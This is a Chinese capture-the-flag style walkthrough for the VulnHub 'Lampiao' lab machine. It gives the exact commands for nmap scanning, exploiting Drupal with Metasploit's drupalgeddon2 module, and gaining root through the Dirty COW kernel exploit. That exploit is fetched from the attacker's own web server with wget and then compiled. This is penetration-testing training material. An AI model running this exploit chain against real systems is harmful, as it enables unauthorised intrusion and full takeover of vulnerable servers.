靶机简介
靶机地址:
https://download.vulnhub.com/lampiao/Lampiao.zip
运行环境:
VirtualBox
攻击测试机环境
kali
win 10
工具简介
msf
dirb
nmap
python
靶机网卡设置
三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。
信息收集
这个靶机坑比较多,信息收集过程中找到许多看似有用信息,但是并没用利用成功,如有其它人找到其它方法可以留言交流一下。
老规矩,nmap主机发现:
命令:nmap 10.211.55.0/24
只发现了22端口,进行了ssh爆破,无果,重新扫描一次全端口。
命令:nmap 10.211.55.28 -p1-65535 -v -A
发现端口1898 访问
之后在web页面是上实验好久,注入,爆破都没成功,不过在目录爆破发现一个robots.txt文件 查看
挨个看了一遍,发现这个日志文件
是drupal的更新日志文件,这里最后的更新时间的2017年2月1日版本是7.54,直接在kalI的maf上查找exp
命令 mafconsole
search drupal
找到一个2018年更新的exp,使用改exp,设置目标ip和目标端口,如果不熟悉这个exp,可以使用info命令查看所需参数。
命令 use exploit/unix/webapp/drupal_drupalgeddon2
设置好参数,执行exp
执行成功,获取到一个回话,这里我们直接用这个回话建立一个交互式shell
命令 shell
python -c ‘import pty; pty.spawn("/bin/bash")’
提权
拿到shell后就是提权了,作者对提权不是很熟悉,所以踏了许多的坑,其实有点经验的查看一下系统内核就可以知道怎么提权了,不废话了,查看系统版本及内核。
命令 cat /proc/version
最后经过作者一系列测试,最后使用脏牛提权成功CVE-2016-5195
找了好几个exp,只有这个成功了,作者菜逼,大佬自由选择
exp:https://github.com/gbonacini/CVE-2016-5195
这个靶机没有git命令,所以只能在本地下载,然后打包上传到服务器上
下载命令 git clone https://github.com/gbonacini/CVE-2016-5195
打包该文件夹
命令 tar -zcvf /root/123.tar CVE-2016-5195/
使用python开启一个web服务,供靶机下载该文件
命令 python -m SimpleHTTPServer 8888
靶机利用获得shell进行下载
命令 wget http://10.211.55.8:8888/123.tar
如图,已经将该文件下载到靶机上,接下来解压
命令: tar -zxvf /var/www/html/123.tar
解压成功后,进入该目录
命令 cd CVE-2016-5195
然后对该文件进行编译
命令 make
生成可执行文件 dcow 利用他进行提权
命令 ./dcow -s
获取到root权限。